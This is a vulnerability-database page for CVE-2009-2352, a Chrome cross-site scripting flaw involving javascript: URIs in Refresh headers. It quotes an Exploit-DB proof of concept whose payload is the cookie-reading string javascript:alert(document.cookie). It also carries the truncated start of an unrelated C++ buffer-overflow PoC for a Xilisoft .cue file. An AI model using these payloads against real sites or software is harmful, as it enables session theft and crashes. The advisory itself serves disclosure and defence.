CVE-2009-2352
published 2009-07-07CVE-2009-2352: Google Chrome 1.0.154.48 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site…
PriorityP417medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
2.05%
78.8th percentile
Google Chrome 1.0.154.48 and earlier does not block javascript: URIs in Refresh headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header or (2) specifying the content of a Refresh header, a related issue to CVE-2009-1312. NOTE: it was later reported that 2.0.172.28, 2.0.172.37, and 3.0.193.2 Beta are also affected.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chrome | <= 1.0.154.48 | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — | |
| chrome | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting
exploitdb·2009-06-03
CVE-2009-2352 Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting
Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/35572/info
Google Chrome is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary script code in the context of the user running the application and to steal cookie-based authentication credentials and other sensitive data that may aid in further attacks.
Chrome 1.0.154.48 is vulnerable; other versions may also be affected.
With request to script at web site:
http://www.example.com/script.php?param=javascript:alert(document.cookie)
Which returns in answer the refresh header:
refresh: 0; URL=javascript:alert(document.cookie)
Exploit-DB
Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)
exploitdb·2009-04-10
CVE-2009-1370 Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)
Xilisoft Video Converter Wizard 3 - '.cue' Stack Buffer Overflow (PoC)
---
/*
Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC
name: xilisoft.cpp
Credits : fl0 fl0w
ScreanShot in the debugger
Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg
*/
//Start
#include
#include
#include
#include
#include
#define SIZE 100000
#define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.."
class EXPLOIT {
public:
int check (char *, char *);
void Usage (char *);
};
static int Poz = 1;
static int Neg = 0;
int i;
char Name [SIZE];
char NeWbuff [SIZE];
int main (int argc, char *argv [])
{
EXPLOIT VIDEO;
if ( argc < 2)
VIDEO.Usage ( argv [0]);
if ( VIDEO.check ( argv [1
No writeups or analysis indexed.
http://websecurity.com.ua/3275/http://websecurity.com.ua/3386/http://www.securityfocus.com/archive/1/504718/100/0/threadedhttp://www.securityfocus.com/archive/1/504723/100/0/threadedhttp://www.securityfocus.com/bid/35572http://websecurity.com.ua/3275/http://websecurity.com.ua/3386/http://www.securityfocus.com/archive/1/504718/100/0/threadedhttp://www.securityfocus.com/archive/1/504723/100/0/threadedhttp://www.securityfocus.com/bid/35572
2009-07-07
Published